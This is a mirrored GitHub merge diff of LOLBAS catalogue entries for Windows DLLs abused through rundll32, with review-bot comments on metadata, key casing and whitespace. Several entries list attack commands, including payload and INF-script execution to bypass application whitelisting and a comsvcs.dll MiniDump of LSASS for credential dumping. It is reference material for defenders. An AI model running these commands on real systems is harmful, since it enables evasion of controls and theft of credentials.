mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-25 19:53:08 +02:00
Merge remote-tracking branch 'upstream/master' into windows_11_sprint
@@ -1,7 +1,7 @@
---
Name: Advpack.dll
Description: Utility for installing software and drivers with rundll32.exe
Author:
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
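Review bot: the previously empty `Author:` (which parses as a YAML null and renders as a blank field) is filled with the generic `LOLBAS Team`; that is a reasonable placeholder for a 2018-05-25 entry with no recorded submitter, but it should not be read as authorship, since the people credited under Acknowledgement (for this file, @moriarty_meng and @ItsReallyNick in the following hunk) are the actual sources of the technique. If the project wants `Author` to mean "who submitted the entry", consider a short note in the contribution guide saying that `LOLBAS Team` is the value to use when that is unknown, so later contributors do not start inventing names.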
@@ -62,4 +62,3 @@ Acknowledgement:
Handle: '@moriarty_meng'
- Person: Nick Carr (Threat Intel)
Handle: '@ItsReallyNick'
---
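Review bot: the header `-62,4 +62,3` records one line removed while every visible line is present in both versions, so what is dropped is a blank line after the closing `---`. Check that the file still ends with exactly one newline (YAML linters flag both a missing final newline and trailing blank lines), and since the same one-line removal recurs at the end of nearly every entry in this merge, an `.editorconfig` with `insert_final_newline = true` plus an end-of-file pre-commit hook would stop this cleanup from reappearing as a separate hunk each time.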
@@ -17,7 +17,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\desk.cpl
- Path: C:\Windows\SysWOW64\desk.cpl
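Review bot: the `OperatingSystem: Windows 10, Windows 11` line is shown as both removed and added with no visible difference, so this is a whitespace-only change, most likely trailing whitespace where the windows_11_sprint branch and upstream made the same Windows 11 edit. It is harmless, but trimming trailing whitespace before merging (a `trailing-whitespace` pre-commit hook is enough) would keep the combined diff down to the real changes, which matters when someone later bisects which commit actually added Windows 11 to an entry.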
@@ -41,4 +41,3 @@ Acknowledgement:
Handle: '@SecurePeacock'
- Person: Jose Luis Sanchez
Handle: '@Joseliyo_Jstnk'
---
@@ -7,7 +7,7 @@ Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
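Review bot: `AWL bypass` to `AWL Bypass` is the right fix, and not just cosmetic: Category is an enumerated value the site groups and filters on, and the Setupapi.dll entry in this same merge uses `AWL Bypass`, so the lower-case variant would have shown up as a category of its own. If CI does not already validate the YAML against the allowed Category values (`Execute`, `AWL Bypass`, and the rest), this hunk is a good argument for adding that check so the next casing typo is rejected before merge rather than cleaned up afterwards.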
@@ -17,13 +17,12 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
Resources:
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---
@@ -1,7 +1,7 @@
---
Name: Ieadvpack.dll
Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.
Author:
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
@@ -59,4 +59,3 @@ Acknowledgement:
Handle: '@0rbz_'
- Person: Pierre-Alexandre Braeken (RegisterOCX - CMD)
Handle: '@pabraeken'
---
@@ -1,12 +1,12 @@
---
Name: Ieframe.dll
Description: Internet Browser DLL for translating HTML code.
Author:
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
Category: Execute
Privileges: User
MitreID: T1218.011
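Review bot: `UseCase:` to `Usecase:` is a key rename rather than a spelling nit: YAML keys are case-sensitive, so a consumer reading `Usecase` (the spelling the Dfsvc.exe entry in this merge already uses) would silently have dropped this entry's use case under the old key. Worth a one-line mention in the commit message because it changes the parsed data, not just the text. Separately, the Description's "a(n) URL (information) file" is hard to read; ".url (Internet Shortcut) file", matching the Url.dll entry's own wording, would say the same thing.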
@@ -28,4 +28,3 @@ Acknowledgement:
Handle: '@bohops'
- Person: Adam
Handle: '@hexacorn'
---
@@ -1,7 +1,7 @@
---
Name: Mshtml.dll
Description: Microsoft HTML Viewer
Author:
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
@@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---
@@ -1,7 +1,7 @@
---
Name: Pcwutl.dll
Description: Microsoft HTML Viewer
Author:
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe
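Review bot: the Description `Microsoft HTML Viewer` is the same text as the Mshtml.dll entry above and does not describe this DLL; pcwutl.dll is the Program Compatibility Wizard helper library (the "pcw" prefix), and its `LaunchApplication` export has nothing to do with HTML rendering. The hunk is already editing the header block of this file, so fix the copy-pasted description in the same change rather than shipping a wrong one next to a freshly normalised Author line.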
@@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Matt harr0ey
Handle: '@harr0ey'
---
@@ -1,19 +1,19 @@
---
Name: Setupapi.dll
Description: Windows Setup Application Programming Interface
Author:
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
UseCase: Run local or remote script(let) code through INF file specification.
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
UseCase: Load an executable payload.
Usecase: Load an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
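Review bot: both `UseCase:` keys become `Usecase:` here, consistent with the Ieframe.dll rename in this merge, so both commands' use cases will now actually be picked up under the canonical key; good. While the block is open: the first command's Description says the script runs "with scrobj.dll in the .inf file", but the Command line only shows `C:\Tools\shady.inf`, so a reader has no indication that the scrobj.dll invocation lives inside the INF section named by `DefaultInstall`. One clause in the Description (or a `Code_Sample` link to an example INF) would make the entry self-contained; as written, the two commands look identical apart from the file name.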
@@ -43,4 +43,3 @@ Acknowledgement:
Handle: '@subTee'
- Person: Nick Carr (Threat Intel)
Handle: '@ItsReallyNick'
---
@@ -1,7 +1,7 @@
---
Name: Shdocvw.dll
Description: Shell Doc Object and Control Library.
Author: Jimmy (@bohops)
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
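Review bot: unlike the other `Author:` hunks in this merge, which only fill an empty field, this one overwrites a real attribution (`Author: Jimmy (@bohops)`) with the generic `LOLBAS Team`. No credit is lost, because the Acknowledgement block later in this diff still lists `Jimmy` / `'@bohops'`, but the two intents should not be mixed silently: if `Author` means "who submitted the entry", Jimmy should stay; if the policy is to normalise every 2018-05-25 entry to the team name, say so in the commit message so the next contributor does not "fix" it back.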
@@ -19,13 +19,12 @@ Code_Sample:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
Resources:
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
- Link: https://twitter.com/bohops/status/997690405092290561
- Link: https://windows10dll.nirsoft.net/shdocvw_dll.html
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
- Link: https://twitter.com/bohops/status/997690405092290561
- Link: https://windows10dll.nirsoft.net/shdocvw_dll.html
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
- Person: Jimmy
Handle: '@bohops'
---
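Review bot: the four Resources links are shown as removed and re-added with no visible difference, so this is whitespace-only plus the trailing blank-line removal (`-19,13 +19,12`), and the Sigma and Acknowledgement lines are untouched. Since the link lines are being rewritten anyway, the first one (`http://www.hexacorn.com/...`) is the only plain-http link in this diff; every other resource is https. Switch it to `https://www.hexacorn.com/...` so a reader following the reference from the site is not sent over an unencrypted connection for no reason.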
@@ -1,7 +1,7 @@
---
Name: Shell32.dll
Description: Windows Shell Common Dll
Author:
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll
@@ -48,4 +48,3 @@ Acknowledgement:
Handle: '@mattifestation'
- Person: Kyle Hanslovan (ShellExec_RunDLL)
Handle: '@KyleHanslovan'
---
@@ -1,7 +1,7 @@
---
Name: Syssetup.dll
Description: Windows NT System Setup
Author:
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
@@ -40,4 +40,3 @@ Acknowledgement:
Handle: '@harr0ey'
- Person: Jimmy (Scriptlet)
Handle: '@bohops'
---
@@ -1,7 +1,7 @@
---
Name: Url.dll
Description: Internet Shortcut Shell Extension DLL.
Author:
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
@@ -69,4 +69,3 @@ Acknowledgement:
Handle: '@DissectMalware'
- Person: r0lan (Obfuscation)
Handle: '@r0lan'
---
@@ -1,7 +1,7 @@
---
Name: Zipfldr.dll
Description: Compressed Folder library
Author:
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe
@@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@moriarty_meng'
- Person: r0lan (Obfuscation)
Handle: '@r0lan'
---
@@ -1,7 +1,7 @@
---
Name: Comsvcs.dll
Description: COM+ Services
Author:
Author: LOLBAS Team
Created: 2019-08-30
Commands:
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
@@ -26,4 +26,3 @@ Resources:
Acknowledgement:
- Person: modexp
Handle:
---
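Review bot: `Handle:` under `- Person: modexp` is left empty, which parses as a YAML null and renders as a blank handle next to the name; the hunk is already editing the end of this block (dropping the trailing blank line per `-26,4 +26,3`), so either fill in the handle or remove the `Handle:` key for this person rather than leaving a null field. The same merge replaces empty `Author:` values everywhere else precisely to avoid nulls, so this one should not be left behind.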